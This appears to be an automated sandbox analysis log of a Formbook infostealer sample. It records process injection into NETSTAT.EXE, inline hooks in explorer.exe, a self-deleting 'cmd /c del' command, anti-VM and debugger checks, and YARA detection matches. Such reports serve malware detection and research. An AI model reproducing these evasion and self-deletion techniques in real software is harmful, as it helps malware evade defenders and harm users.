          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028A9E90 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028A9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028A9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028A9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028A9E0A NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028A9D5A NtCreateFile,
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_0041E000
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00401030
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_0041D1AB
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_0041E258
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00401208
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_0041DD7D
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00402D87
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00402D90
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00409E40
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00409E3B
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_0041DF3E
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00402FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D46E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D3B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D3841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DE1002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D3D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF1D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D20D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D44120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028AE258
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028AE000
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028AD1AB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02899E3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02899E40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02892FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02892D87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02892D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02D2B150 appears 32 times
          Source: 6KdTCZit4e.exe, 00000000.00000000.656062623.000000000080A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTimeSpanStyl.exe2 vs 6KdTCZit4e.exe
          Source: 6KdTCZit4e.exe, 00000007.00000002.793159947.00000000008CA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTimeSpanStyl.exe2 vs 6KdTCZit4e.exe
          Source: 6KdTCZit4e.exe, 00000007.00000002.796525668.00000000014FF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 6KdTCZit4e.exe
          Source: 6KdTCZit4e.exe, 00000007.00000002.797353151.0000000001720000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs 6KdTCZit4e.exe
          Source: 6KdTCZit4e.exeBinary or memory string: OriginalFilenameTimeSpanStyl.exe2 vs 6KdTCZit4e.exe
          Source: 6KdTCZit4e.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 7.2.6KdTCZit4e.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.6KdTCZit4e.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.6KdTCZit4e.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.6KdTCZit4e.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.792849864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.792849864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.796818614.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.796818614.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.924732457.0000000002890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.924732457.0000000002890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.796897067.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.796897067.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@2/2
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6KdTCZit4e.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_01
          Source: 6KdTCZit4e.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 6KdTCZit4e.exeVirustotal: Detection: 38%
          Source: 6KdTCZit4e.exeReversingLabs: Detection: 19%
          Source: unknownProcess created: C:\Users\user\Desktop\6KdTCZit4e.exe 'C:\Users\user\Desktop\6KdTCZit4e.exe'
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess created: C:\Users\user\Desktop\6KdTCZit4e.exe C:\Users\user\Desktop\6KdTCZit4e.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\6KdTCZit4e.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess created: C:\Users\user\Desktop\6KdTCZit4e.exe C:\Users\user\Desktop\6KdTCZit4e.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\6KdTCZit4e.exe'
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 6KdTCZit4e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 6KdTCZit4e.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: 6KdTCZit4e.exeStatic file information: File size 1148416 > 1048576
          Source: 6KdTCZit4e.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x116a00
          Source: 6KdTCZit4e.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: 6KdTCZit4e.exe, 00000007.00000002.797353151.0000000001720000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.741672578.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: 6KdTCZit4e.exe, 00000007.00000002.797353151.0000000001720000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 6KdTCZit4e.exe, 00000007.00000002.795763283.000000000136F000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000D.00000002.925610066.0000000002D00000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 6KdTCZit4e.exe, 00000007.00000002.795763283.000000000136F000.00000040.00000001.sdmp, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.741672578.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_0041721D push es; ret
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_004175DF push ds; iretd
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_004175A0 push ds; iretd
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_0041B68C pushad ; iretd
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_0041CF0B push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D7D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028A721D push es; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028AB68C pushad ; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028ACEB5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028ACF0B push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028ACF02 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028ACF6C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028A75A0 push ds; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_028A75DF push ds; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.05866733506

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE9
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 6KdTCZit4e.exeBinary or memory string: WIRESHARK|WIRESHARK.EXE
          Source: 6KdTCZit4e.exeBinary or memory string: SKYPE|SKYPE.EXE'FIREFOX|FIREFOX.EXE+BOOTCAMP|BOOTCAMP.EXE/WIRESHARK|WIRESHARK.EXEAPROCESS HACKER|PROCESSHACKER.EXELOAD
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000028998E4 second address: 00000000028998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000002899B5E second address: 0000000002899B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\6KdTCZit4e.exe TID: 6572Thread sleep time: -54990s >= -30000s
          Source: C:\Users\user\Desktop\6KdTCZit4e.exe TID: 6620Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6176Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6680Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeThread delayed: delay time: 54990
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeThread delayed: delay time: 922337203685477
          Source: 6KdTCZit4e.exeBinary or memory string: vmCIYd
          Source: explorer.exe, 00000008.00000000.741348182.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000008.00000000.748027302.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.778347337.0000000004710000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&f
          Source: explorer.exe, 00000008.00000000.742728647.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 6KdTCZit4e.exeBinary or memory string: DdUXhZQ[fUE6Ws]YTSk6WLInYD73f[o5QsEYYq{nV]8XY[8XVpEzfoQZd5M[]WMZ][<IgogJD}4pfy]3[3Y5]DL[]}Y4[3Y5]D75esU[\moJezE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ
          Source: explorer.exe, 00000008.00000000.748027302.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.748412391.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000008.00000000.778347337.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000008.00000000.741348182.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000008.00000000.748412391.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000008.00000000.741348182.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000008.00000000.748506664.000000000A77F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000008.00000000.741348182.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_0040ACD0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D68EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DDFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DBFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D5FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DA46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DB4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D6927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DDB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DDB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02DF8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D3766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D43A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D2C600 mov eax, dword ptr fs:[00000030h]
